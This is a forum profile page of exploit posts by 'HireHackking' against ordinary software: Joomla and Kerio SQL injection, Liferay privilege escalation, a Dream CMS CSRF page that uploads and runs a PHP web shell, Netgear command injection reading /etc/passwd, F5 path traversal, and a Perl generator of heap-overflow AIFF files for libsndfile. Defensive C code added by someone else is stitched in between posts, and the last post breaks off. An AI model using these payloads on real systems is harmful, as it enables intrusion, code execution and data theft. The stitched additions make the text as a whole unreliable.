HireHackking

Everything posted by HireHackking

  1. # Description of component: This Joomla component is perfect for independent estate agents, property rental companies and agencies, hotel booking, hotel manage, motel booking, motel manage.
     ##################################################################################################
     # Exploit Title: [Joomla component com_realestatemanager - SQL injection]
     # Google Dork: [inurl:option=com_realestatemanager]
     # Date: [2015-10-10]
     # Exploit Author: [Omer Ramić]
     # Vendor Homepage: [http://ordasoft.com/]
     # Software Link: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
     # Version: [3.7] & probably all prior
     # Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
     ##################################################################################################
     # Multiple vulnerable parameters (POC given only for the first parameter):
     Parameter_1: order_direction (POST)
     Parameter_2: order_field (POST)
     # The vulnerable parameters 1 & 2 are within the following request:
     POST /index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132 HTTP/1.1
     Host: [HOST]
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
     Cookie: security_level=0; 9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
     Connection: keep-alive
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 37

     order_direction=asc&order_field=price
     # Vectors:
     POC_1: order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE 7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order_field=price
     POC_2: order_direction=asc,(SELECT 1841 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT (ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price
     ###################################
     # Greets to Palestine from Bosnia #
     ###################################
  2. # Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation
     # Date: 18/05/2015
     # Exploit Author: Massimo De Luca - mentat.is
     # Vendor Homepage: https://www.liferay.com
     # Software Link: http://www.liferay.com/it/community/releases/-/asset_publisher/nSr2/content/id/18060360
     # Version: 6.1.0 CE
     # Tested on: -

     Explanation:
     Any logged-in user can change his "User Group" membership by editing the parameter _2_userGroupsSearchContainerPrimaryKeys in the HTTP POST request generated when updating his profile in the page "Manage my account". This may lead to privilege escalation.

     Proof of Concept:
     POST /group/control_panel/manage?p_auth=J3jbveH7&p_p_id=2&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&doAsGroupId=19&refererPlid=10839&controlPanelCategory=my&_2_struts_action=%2Fmy_account%2Fedit_user HTTP/1.1
     [...]
     [...]_2_organizationsSearchContainerPrimaryKeys=&_2_groupsSearchContainerPrimaryKeys=19&_2_userGroupsSearchContainerPrimaryKeys=[NEW GROUP ID]&_2_groupRolesRoleIds=[...]

     For your reference I'm attaching the full request in a separate file.

     In order to test the vulnerability on a fresh installation:
     - Create two different groups with different roles and permissions (i.e. one with administrator permissions, and a regular user)
     - Create two different users, one for each group

     Solution:
     The vendor is aware of the problem and has fixed the issue in newer releases

     #Massimo De Luca
     #mdeluca [at] mentat.is
     #Mentat.is
  3. <!--
     Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution

     Vendor: Dream CMS
     Product web page: http://www.dream-cms.kg
     Affected version: 2.3.0

     Summary: DreamCMS is open and completely free PHP web application for constructing websites of any complexity.

     Desc: Dream CMS allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Related to the CSRF issue, an authenticated arbitrary PHP code execution exists. The vulnerability is caused due to the improper verification of uploaded files in '/files-manager-administration/add-file' script via the 'file' POST parameter, which allows arbitrary files to be uploaded in '/resource/filemanager/1/home/' where the admin first needs to add the file extension in the allowed list (csrf'd). This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script file and execute system commands.

     Tested on: nginx/1.6.2
                PHP/5.5.28

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2015-5268
     Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5268.php

     01.10.2015
     -->
     <html>
     <head>
     <title>Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution</title>
     </head>
     <body onload="exploitrun();">
     <!-- 1. Add PHP allowed extension -->
     <form name="addext" action="http://TARGET/pages/en/files-manager-administration/settings" method="POST" target="frame0">
       <input type="hidden" name="form&#95;name" value="settings" />
       <input type="hidden" name="file&#95;manager&#95;allowed&#95;extensions" value="bmp&#44;gif&#44;jpg&#44;png&#44;mp3&#44;wav&#44;wma&#44;3g2&#44;3gp&#44;avi&#44;flv&#44;mov&#44;mp4&#44;mpg&#44;swf&#44;vob&#44;wmv&#44;zip&#44;rar&#44;txt&#44;doc&#44;docx&#44;pdf&#44;php" />
       <input type="hidden" name="file&#95;manager&#95;allowed&#95;size" value="2097152" />
       <input type="hidden" name="file&#95;manager&#95;file&#95;name&#95;length" value="20" />
       <input type="hidden" name="file&#95;manager&#95;image&#95;extensions" value="bmp&#44;gif&#44;jpg&#44;png" />
       <input type="hidden" name="file&#95;manager&#95;media&#95;extensions" value="mp3&#44;wav&#44;wma&#44;3g2&#44;3gp&#44;avi&#44;flv&#44;mov&#44;mp4&#44;mpg&#44;swf&#44;vob&#44;wmv" />
       <input type="hidden" name="file&#95;manager&#95;window&#95;width" value="60" />
       <input type="hidden" name="file&#95;manager&#95;window&#95;height" value="500" />
       <input type="hidden" name="file&#95;manager&#95;window&#95;image&#95;height" value="300" />
       <input type="hidden" name="submit" value="Save" />
     </form>
     <!-- 2. Upload PHP file -->
     <script>
     function upload() {
       var xhr = new XMLHttpRequest();
       xhr.open("POST", "http://TARGET/pages/en/files-manager-administration/add-file?path=home", true);
       xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
       xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
       xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuCEcIcPhpF3WD8Sv");
       xhr.withCredentials = true;
       var body = "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
         "Content-Disposition: form-data; name=\"form_name\"\r\n" +
         "\r\n" +
         "file\r\n" +
         "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
         "Content-Disposition: form-data; name=\"file\"; filename=\"billy.php\"\r\n" +
         "Content-Type: application/octet-stream\r\n" +
         "\r\n" +
         "\x3c?php\r\n" +
         "system($_GET[\"cmd\"]);\r\n" +
         "?\x3e\r\n" +
         "\r\n" +
         "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
         "Content-Disposition: form-data; name=\"submit\"\r\n" +
         "\r\n" +
         "Submit\r\n" +
         "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv--\r\n";
       var aBody = new Uint8Array(body.length);
       for (var i = 0; i < aBody.length; i++)
         aBody[i] = body.charCodeAt(i);
       xhr.send(new Blob([aBody]));
     }
     </script>
     <form name="uploadme" action="javascript:upload();" target="frame1">
     </form>
     <!-- 3. Code execution -->
     <form name="exploit" action="http://TARGET/resource/filemanager/1/home/billy.php" method="GET" target="frame2">
       <input type="hidden" name="cmd" value="whoami" />
     </form>
     <iframe name="frame0"></iframe>
     <iframe name="frame1"></iframe>
     <iframe name="frame2"></iframe>
     <script>
     function exploitrun() {
       document.addext.submit();
       document.getElementsByTagName("iframe")[0].onload = function() {
         document.uploadme.submit();
         document.getElementsByTagName("iframe")[1].onload = function() {
           document.exploit.submit();
         }
       }
     }
     </script>
     </body>
     </html>
  4. # Exploit Title: [Netgear Voice Gateway Multiple Vulnerabilities]
     # Date: May 01, 2015 [No response from Vendor]
     # Discovered by: Karn Ganeshen
     # Vendor Homepage: [www.netgear.com]
     # Version: [Firmware Version: V2.3.0.23_2.3.23]

     *Netgear Voice Gateway Multiple Vulnerabilities*

     *Device Info*
     Device Type: Netgear Voice Gateway EVG2000
     Account Name: EVG2000
     Firmware Version: V2.3.0.23_2.3.23

     *1. Web application vulnerabilities*
     *OS Command Injection*
     Netgear Voice Gateway EVG2000 is managed through a web management portal. The application provides a Diagnostics feature that has four (4) options:
     a. Ping an IP address
     b. Perform a DNS Lookup
     c. Display the Routing Table
     d. Reboot the Router
     Option 1, Ping an IP address, was confirmed to be vulnerable to OS Command Injection. The ping_IPAddr parameter does not sufficiently validate input. It is possible to use the semi-colon character (;) to inject arbitrary OS commands and retrieve the output in the application's responses.

     *PoC*
     *HTTP POST Request*
     POST /ping.cgi HTTP/1.1
     Host: 1.3.3.7
     User-Agent: blah
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US
     Referer: http://1.3.3.7/DIAG_diag.htm
     Authorization: Basic <b64_value_here>
     Content-Length: 69

     IPAddr1=1&IPAddr2=3&IPAddr3=3&IPAddr4=7&ping=Ping&ping_IPAddr=1.3.3.7;cat /etc/passwd

     *HTTP Response*
     .....
     <html-output>
     root:<redacted_hash>:0:0:Linux User,,,:/root/:/bin/sh
     nobody:*:0:0nobody:/:/bin/sh
     admin:<clear-text-admin-pass>:0:0:admin:/:/bin/sh

     *2. Web application vulnerabilities*
     *Stored Cross-Site Scripting (XSS)*
     In the Services menu, the Service Table lists any existing Service-Port mappings. A new service can be added with a payload value of *<script>alert(xss)</script>* in the ServiceType parameter. The application does not check any malicious input and accepted this new entry. The JavaScript input was then returned unmodified in a subsequent request for the Services Table Entries. The web application lacks strict input validation and hence is vulnerable to Stored Cross-Site Scripting attack.

     *3. Application does not secure configured passwords (HTTP)*
     Any & all configured sensitive information such as passwords & keys are not secured properly. These are masked and only ***** is shown in the corresponding fields. This client-side restriction can easily be bypassed though. It is possible to capture masked values via 'Inspect Element' and / or via an intercepting proxy. The application should mask/censor (*****) the passwords, keys and any other crucial pieces of configuration and must not pass the values in clear-text.
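Added here as a defender-side illustration, not code from the advisory or from Netgear's firmware: a strict dotted-quad validator for a value such as ping_IPAddr, the shell-interpolation pattern that lets a trailing `;` through, and a fork/execvp runner that hands the validated address to ping as a single argv element so no shell ever parses it. The function names (is_strict_ipv4, unsafe_command_line, run_ping_no_shell) are my own.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Strict dotted-quad check: exactly four decimal octets 0..255, digits and
 * dots only, no leading zeros (avoids octal ambiguity in some ping builds).
 * Anything else, including "1.3.3.7;cat /etc/passwd", is rejected. */
int is_strict_ipv4(const char *s)
{
    int octets = 0;
    if (s == NULL || *s == '\0') return 0;
    while (*s) {
        int val = 0, ndig = 0;
        if (*s == '0' && s[1] >= '0' && s[1] <= '9') return 0; /* leading zero */
        while (*s >= '0' && *s <= '9') {
            val = val * 10 + (*s - '0');
            if (val > 255 || ++ndig > 3) return 0;
            s++;
        }
        if (ndig == 0) return 0;                 /* empty octet, e.g. "1..2.3" */
        octets++;
        if (*s == '.') { s++; if (*s == '\0') return 0; continue; }
        if (*s != '\0') return 0;                /* ';', space, newline, ... */
    }
    return octets == 4;
}

/* The pattern the advisory implies: the raw parameter is spliced into a shell
 * command line, so a ';' ends the ping and starts a second command. Returns 1
 * when the line fit; included only to contrast with the safe path below. */
int unsafe_command_line(const char *ip, char *out, size_t n)
{
    int len = snprintf(out, n, "ping -c 3 %s", ip);   /* would go to system() */
    return len >= 0 && (size_t)len < n;
}

/* Hardened variant: validate first, then run ping directly via fork/execvp
 * with the address as one argv element. No shell means no metacharacters.
 * Returns -1 on rejected input or spawn failure, else ping's exit status. */
int run_ping_no_shell(const char *ip)
{
    if (!is_strict_ipv4(ip)) return -1;
    char *argv[] = { "ping", "-c", "3", (char *)ip, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execvp(argv[0], argv); _exit(127); }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```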
  5. # Exploit Title: [F5 BigIP File Path Traversal Vulnerability]
     # Discovered by: Karn Ganeshen
     # Reported on: April 27, 2015
     # New version released on: September 01, 2015
     # Vendor Homepage: [www.f5.com]
     # Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3]
     # CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040]
     # Multiple Additional F5 products & versions are Affected and documented here: https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html

     *Vulnerability Details*
     The handler parameter is vulnerable to file path manipulation attacks. When we submit a payload */tmui/locallb/virtual_server/../../../../WEB-INF/web.xml* in the *handler* parameter, the file *WEB-INF/web.xml* is returned.

     *PoC:*
     POST /tmui/Control/form HTTP/1.1
     Host: <IP>
     Accept: */*
     Accept-Language: en
     User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
     Connection: close
     Referer: https://<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 1004
     Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F; BIGIPAuthUsernameCookie=admin; BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/locallb/virtual_server/list.jsp?&"; f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""

     _timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno *...[SNIP]...* fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler=*%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml*

     *Web.xml is returned in the Response:*
     <?xml version="1.0" encoding="ISO-8859-1"?>
     <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN" "http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
     *<!--Automatically created by Tomcat JspC.--><web-app>*
     *...[config file output redacted here]...*
     *.....*
  6. #!/usr/bin/env perl
     #
     # Exploit Title: libsndfile <= 1.0.25 (latest version) Heap overflow
     # Date: 07 Oct 2015
     # Exploit Author: Marco Romano @nemux_
     # Vendor Homepage: http://www.mega-nerd.com/libsndfile/
     # Version: <= 1.0.25
     # Tested on: Ubuntu 15.04 / OS X El Capitan 10.11
     #
     ####################################################################
     #
     # Author: Marco Romano (@nemux_) - 07 Oct 2015
     #
     # PoC for libsndfile <= 1.0.25 (latest version) Heap overflow
     #
     # run ./poc.pl to make nemux.aiff file. Now it can be delivered in different ways.
     #
     # Possible attack vectors:
     # - Firefox (on Linux) -> SWF/Audio play -> pulseaudio -> libsndfile ?? (not tested)
     # - Email attachment
     # - TCP socket connection (for audio server only)
     # - File upload (ex. server side audio file manipulation, interactive voice responder)
     # - etc...
     # -----------------------------------------------------------------------------------------
     # [*] Affected products: -- All products using libsndfile (a non-exhaustive list below)
     #
     # [-] PulseAudio - http://www.freedesktop.org/wiki/Software/PulseAudio/ (TESTED)
     #     Installed by default on most linux environments with libsndfile too (Ex.: Ubuntu, Debian)
     # [-] Jack Audio Connection Kit - http://www.jackaudio.org (TESTED)
     #     Available for Linux, Win, OSX (List of applications http://www.jackaudio.org/applications/)
     # [-] Adobe Audition - http://www.adobe.com/products/audition.html (TESTED)
     # [-] Audacity - http://www.audacityteam.org/ (TESTED)
     # [-] Asterisk-eSpeak Module - https://zaf.github.io/Asterisk-eSpeak/ (NOT TESTED)
     #
     # run an "apt-cache rdepends libsndfile1" to see other interesting dependencies
     # searching around I found that library is widely used on iOS and Android projects too
     # ------------------------------------------------------------------------------------------
     # [*] libsndfile web site references
     #
     # [-] http://www.mega-nerd.com/libsndfile/
     # [-] https://github.com/erikd/libsndfile.git
     # [-] https://en.wikipedia.org/wiki/Libsndfile
     #
     # Note: (wikipedia reports that LAME encoder depends on libsndfile too
     # but I didn't find this dependency...)
     ########################################################################################
     #### Vulnerability is based on the wrong management of the headindex and headend values.
     #### While parsing a specially crafted AIFF header the attacker can manage index values
     #### in order to use memcpy(...) to overwrite memory heap.
     ########################################################################################
     ####
     # Some parts of the source code:
     #
     # -- common.c:337 [*]
     # ...
     # #define SF_STR_BUFFER_LEN (8192)
     # #define SF_HEADER_LEN (4100 + SF_STR_BUFFER_LEN)
     # ...
     # typedef struct sf_private_tag
     # {
     #   ...
     #   ...
     #   /* Index variables for maintaining logbuffer and header above. */
     #   ...
     #   int headindex, headend ;
     #   ...
     #   /* Virtual I/O functions. */
     #   int virtual_io ;
     #   SF_VIRTUAL_IO vio ;
     #   ...
     #   ...
     # } SF_PRIVATE;
     #
     # Take a look to the source of aiff.c:
     # -- git clone https://github.com/erikd/libsndfile.git
     #
     # src/aiff.c:403
     # while (!done) { ... }
     # -->
     # src/common.c:
     # int psf_binheader_readf (SF_PRIVATE *psf, char const *format, ...) { }
     # --> -->
     # src/common.c:793
     # static int header_read (SF_PRIVATE *psf, void *ptr, int bytes)
     # --> --> -->
     # src/common.c:
     # static int header_read(...) {
     #   ...
     #   memcpy (ptr, psf->header + psf->headindex, bytes) ;
     #   psf->headindex += bytes ;
     #
     # } /* header_read */
     #
     # Through a specially crafted AIFF header we can
     # 1- increase and decrease the headindex value regardless what should be its real value
     # 2- Overwriting memory with arbitrary data...
     #
     ### PulseAudio test on x86_64
     #
     # Starting program: /usr/bin/paplay nemux.aiff
     # [Thread debugging using libthread_db enabled]
     # Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
     # Program received signal SIGSEGV, Segmentation fault.
     # [----------------------------------registers-----------------------------------]
     # RAX: 0x41414141 ('AAAA')
     # RBX: 0x60d3e0 --> 0x0
     # RCX: 0x610a80 --> 0x0
     # RDX: 0x44444444 ('DDDD')
     # RSI: 0x1
     # RDI: 0x7ea
     # RBP: 0x36b0
     # RSP: 0x7fffffffd958 --> 0x7ffff76cfe71 (pop rbx)
     # RIP: 0x41414141 ('AAAA')
     # ...
     # [-------------------------------------code-------------------------------------]
     # Invalid $PC address: 0x41414141
     # [------------------------------------------------------------------------------]
     # Legend: code, data, rodata, value
     # Stopped reason: SIGSEGV
     # 0x0000000041414141 in ?? ()
     #########
     ##########################################################################################

     my $header_aiff_c = "\x46\x4F\x52\x4D" .   ### FORM and VERSION
         "\x00\x00\xD0\x7C" .
         "\x41\x49\x46\x43" .
         "\x42\x56\x45\x52" .
         "\x00\x00\x00\x04" .
         "\xA2\x80\x51\x40" .
         "\x43\x4F\x4D\x4D" .   ### COMM Chunk and Compression NONE (PCM)
         "\x00\x00\x00\x11" .
         "\x00\x01\x00\x00" .
         "\x00\x00\x00\x10" .
         "\xF3\x0C\xFA\x00" .
         "\x00\x00\x00\x00" .
         "\x00\x00\x4E\x4F" .
         "\x4E\x45\x0E\x6E" .
         "\x6F\x74\x20\x63" .
         "\x63\x6D\x92\x72" .
         "\x65\x73\x53\x65\x64\x00" .
         "\x53\x53\x4E\x44" .   ### 2 SSND Chunks
         "\x00\x00\x00\x40" .
         "\x00\x00\x00\xAA" .
         "\xBD\xBD\xC5\x58" .
         "\xBD\x96\xCA\xB0" .
         "\xE9\x6F\x0A\xFE" .
         "\x24\xCD\x26\x65" .
         "\x73\x73\x65\x64" .
         "\x00\x53\x53\x4E" .
         "\x44\x00\x00\x00" .
         "\x40\x00\x00\x00" .
         "\x00\xF8\x72\xF3" .
         "\x59\xFB\x56\xFE" .
         "\x00\x00\x00\x3E" .
         "\xE9\x22\x66\x94" .
         "\x4E\x66\x55\x94" .
         "\x4E\xD4\xD7\xC5" .
         "\x42\x49\x61\xC4" .
         "\x43\x4F\x4D\x54" .   ### 2 COMT Chunks
         "\x00\x00\x00\x26" .
         "\x00\x01\x00\x20" .
         "\x68\x17\x0C\x10" .
         "\x25\x03\x00\x10" .   ### 0x2503 items
         "\x03\x80\xFF\x37" .
         "\x52\x00\x00\x00" .
         "\x04\xA2\x8E\x51" .
         "\x40\x43\x4F\x4D" .
         "\x54\x00\x00\x0B" .
         "\x26\x00\x01\x00" .
         "\x20\x68" .
         "\x17\x00\x10\x03" .   ### Start wrong and junk chunks (they will trigger default block in the switch statement in aiff.c)
         "\x03\x00\x10\x1B" .
         "\x80\xFF\xFF\x4F" .
         "\x4E\x45\x1F\x6E" .   ### my debug: heap 0x161e0d8
         "\x6F\x00\x01\x00" .   ### my debug: heap 0x161e0dc
         "\x00\xE4\x7F\x72" .   ### ...
         "\x00\x00\x00\xD7" .
         "\xBA\x17\xFF\xE3" .
         "\x1F\x40\xFF\x20" .
         "\x18\x08\xDD\x18" .
         "\x00\x28\x00\x28" .
         "\x00\x28\x40\x28" .
         "\x00\x28\x00\x28" .
         "\x00\x28\xFF\xFF" .
         "\xFF\x80\xF7\x17" .
         "\x00\x18\x01\x00" .
         "\x20\x68\x17\x0C" .
         "\x10\x03\x03\x00" .
         "\x10\x03\x80\xFF" .
         "\xFF\x4F\x4E\x45" .
         "\x0A\x6E\x70\x00" .
         "\x18\xDE\x3A\x08" .
         "\x00\x18\x21\xA6" .
         "\x05\x7F\x40\x00" .
         "\x08\xFF\x5D\x00" .
         "\xF0\x00\x4F\x00" .
         "\x6A\xFF\x89\x9D" .
         "\xDA\x07\xB6\xFF" .
         "\x2C\x92\xB3\x0D" .
         "\xE4\x40\xBB\x23" .
         "\x00\x18\x00\x38" .
         "\x00\x63\x00\x28" .
         "\x00\x90\xFF\xFF" .
         "\x20\x18\x08\xDD" .
         "\x18\x00\x28\x00" .
         "\x28\x00\x5E\xFC" .
         "\x78\xD9\xAD\xCD" .
         "\x9E\x3E\xE9\x21" .
         "\x55\x94\x4E\x85" .
         "\x51\x94\x4E\xA6" .
         "\xD7\xC5\x42\xA7" .
         "\x2A\x55\xC4\x9F" .
         "\x43\x4F\x4D\x54" .   ### here start next COMT Chunk with 0x36B0 items
         "\x08\x00\x00\x26" .
         "\x00\x01\x00\x20" .
         "\x68\x17\x0C\xDD" .
         "\x36\xB0";
     #### end of header...

     my $file = "nemux.aiff";

     if (defined $ARGV[0] && ($ARGV[0] eq "h" || $ARGV[0] eq "help")) {
         print "\n[*] POC for libsndfile <= 1.0.25 (latest version)\n";
         print "[*] Heap overflow vulnerability\n";
         print "[*] Author: Marco Romano (\@nemux_) - 07 Oct 2015 \n";
         print "\n Just run " . $0 . " (output will be \"nemux.aiff\" file)\n\n";
         exit 0;
     }

     my $eax_addr = 0x41414141;
     my $edx_addr = 0x44444444;

     #####
     #### We are going to overwrite psf structure allocated in the heap
     #####
     my $content_file = pack('Q', $eax_addr);
     $content_file .= "\x90" x ( 21146 - length pack('Q',$eax_addr) );

     #####
     ### In the psf structure we will overwrite "int virtual_io" with a true value, and vio.seek function pointer
     ### with an arbitrary address.
     ### in this way the block below will be triggered in file_io.c:
     ### ...
     ### if (psf->virtual_io)
     ###     return psf->vio.seek (...);
     ###
     #####
     my $rax_overwrite = pack('Q',$eax_addr);        ### overwrite vio.seek pointer here
     my $padding = "\x43" x 24;                       ### ....
     my $rdx_overwrite = pack('Q',$edx_addr);        ### overwrite rdx here ...
     my $padding_end_file = "MOMIMANHACKERNOW" x 7;  ### not useful but funny... -_-

     print "\n[*] Making AIFF file: \"nemux.aiff\"";
     my $payload = $header_aiff_c . $content_file . $rax_overwrite . $padding . $rdx_overwrite . $padding_end_file;
     print "\n[*] Done... AIFF File Size: ".length($payload)."\n";
     print "\nIs it over? ... Hello? ... Did we win? (cit.)\n";

     # write the file in binary mode so no platform newline translation touches the header bytes
     open(my $FILE, '>', $file) or die "Cannot open $file: $!";
     binmode($FILE);
     print $FILE $payload;
     close($FILE);

     print "\n[+] You can test it on OSX and Linux with Audacity - linux command line /usr/bin/audacity nemux.aiff\n";
     print "[+] You can test it on OSX Windows and Linux - with Adobe Audition";
     print "\nNote: Adobe Audition will trigger the bug just when it scans the directory that contains this aiff file\n\n";
     print "Marco Romano \@nemux_\n\n";
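Added example, not code from the PoC above or from libsndfile: a bounds-checked stand-in for header_read() and a chunk-skip routine over the same headindex/headend pair, showing the two checks that keep a crafted AIFF header from moving the cursor past the bytes actually read into the header buffer (the condition the PoC's oversized COMT chunks rely on). The hdr_t struct is an assumed simplification of SF_PRIVATE; the function names are mine, and the header bytes used in the test are constructed.

```c
#include <string.h>
#include <stdint.h>

#define SF_STR_BUFFER_LEN (8192)
#define SF_HEADER_LEN (4100 + SF_STR_BUFFER_LEN)

/* Stand-in for the header-related fields of libsndfile's SF_PRIVATE
 * (assumed layout, only what the checks below need). */
typedef struct {
    unsigned char header[SF_HEADER_LEN];
    int headindex;   /* read cursor into header[] */
    int headend;     /* number of valid bytes currently in header[] */
} hdr_t;

/* Load constructed header bytes into the buffer, refusing oversize input. */
int hdr_load(hdr_t *psf, const unsigned char *data, int len)
{
    if (len < 0 || len > SF_HEADER_LEN) return -1;
    memset(psf, 0, sizeof *psf);
    memcpy(psf->header, data, (size_t)len);
    psf->headend = len;
    return len;
}

/* Bounds-checked replacement for the memcpy in header_read(): the copy may
 * only cover bytes that were really read into header[]. The cursor is left
 * untouched on failure so a later read cannot start from a bad index. */
int header_read_checked(hdr_t *psf, void *ptr, int bytes)
{
    if (bytes < 0 || psf->headindex < 0 || psf->headindex > psf->headend)
        return -1;
    if (bytes > psf->headend - psf->headindex)   /* subtraction avoids int overflow */
        return -1;
    memcpy(ptr, psf->header + psf->headindex, (size_t)bytes);
    psf->headindex += bytes;
    return bytes;
}

/* Relative seek, the operation a chunk-size or item-count field drives.
 * The new cursor must stay inside [0, headend]; returns it, or -1. */
int header_seek_checked(hdr_t *psf, int delta)
{
    if (delta > 0 && delta > psf->headend - psf->headindex) return -1;
    if (delta < 0 && -delta > psf->headindex) return -1;
    psf->headindex += delta;
    return psf->headindex;
}

/* Parse one chunk header (4-byte ID, 4-byte big-endian size) and step over
 * the body. Returns the size, or -1 when the declared size does not fit in
 * the bytes that remain; on that failure the cursor is restored to the
 * chunk start. `id` receives the NUL-terminated chunk ID. */
int skip_chunk_checked(hdr_t *psf, char id[5])
{
    unsigned char raw[8];
    if (header_read_checked(psf, raw, 8) != 8) return -1;
    memcpy(id, raw, 4);
    id[4] = '\0';
    uint32_t size = ((uint32_t)raw[4] << 24) | ((uint32_t)raw[5] << 16) |
                    ((uint32_t)raw[6] << 8)  |  (uint32_t)raw[7];
    if (size > (uint32_t)(psf->headend - psf->headindex)) {
        psf->headindex -= 8;
        return -1;
    }
    psf->headindex += (int)size;
    /* AIFF chunks are word-aligned; consume the pad byte only if present. */
    if ((size & 1) && psf->headindex < psf->headend) psf->headindex++;
    return (int)size;
}
```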
  7. IntelliSec Security Advisory
     ==============================================================================================
     Title: Multiple Vulnerabilities in Kerio Control (Virtual Appliance)
     Vulnerabilities: SQL Injection, Remote Code Execution through CSRF
     Product: Kerio Control
     Homepage: http://www.kerio.com
     Affected Version: <= 8.6.1
     Fixed Version: 8.6.2 (partially fixed)
     Impact: critical
     Date: 2015-10-12
     Author: Raschin Tavakoli | IntelliSec Research
             http://www.intellisec.at
             research@intellisec.at
     Links: https://youtu.be/EzTI2WlGHb4
     ===============================================================================================

     Vendor description:
     ===================
     Kerio Control is a unified threat management firewall developed by Kerio Technologies. It features intrusion prevention, content filtering, activity reporting, bandwidth management, and virtual private networking. Kerio Control runs Linux, providing network perimeter defense for small to medium organizations.

     Vulnerabilities
     ===============
     1. XSS with Anti-XSS-Filter bypass (nonauth area)
     2. SQL Injection (non-admin area)
     3. Remote Code Execution (admin area)

     By chaining the vulnerabilities together in combination with user interaction, an attacker may gain full control over the firewall and the underlying network.

     Attack Scenario
     ===============
     The first attack could be to trick non-admin users to follow a malicious link in order to trigger a CSRF exploit via the /nonauth/certificate.php script. The script may exploit the SQL Injection flaw in reports.php for example. Once able to query the database, sensitive data of the users can be transmitted back to the attacker. Information of interest could be for example the traffic usage of admin users and their top-visited webpages. In the next attack, this information may be used to embed another CSRF exploit into one of the top-visited webpages. If the attacker succeeds and the exploit gets triggered by a visiting admin, arbitrary remote code execution will be gained.

     ===============================================================================================
     1. SQL Injection:
     ===============================================================================================
     Short Description:
     ==================
     Kerio Control suffers from an SQL Injection flaw in the report.php script.

     Detailed Description:
     =====================
     It is not necessary to use blind sql injection, as the output will be rendered into an image file. As the text in the image file has a fixed size, multiple union selects can be combined to render out multiple images containing the result text of the query. In order to exploit the issue, a user has to be authenticated. For non-admin users, webreports have to be enabled.

     This issue is fixed in 8.6.2

     Proof of Concept:
     =================
     GET /report.php?id=1'+OR+'1'%3d'1'%3b+-- HTTP/1.1
     Host: testbox:4081
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Cookie: SESSION_CONTROL_WEBIFACE=c0fa6c207d812da1fce3e2ff2bc2e609948988a041f5a23adb64064a42010e6b; TOKEN_CONTROL_WEBIFACE

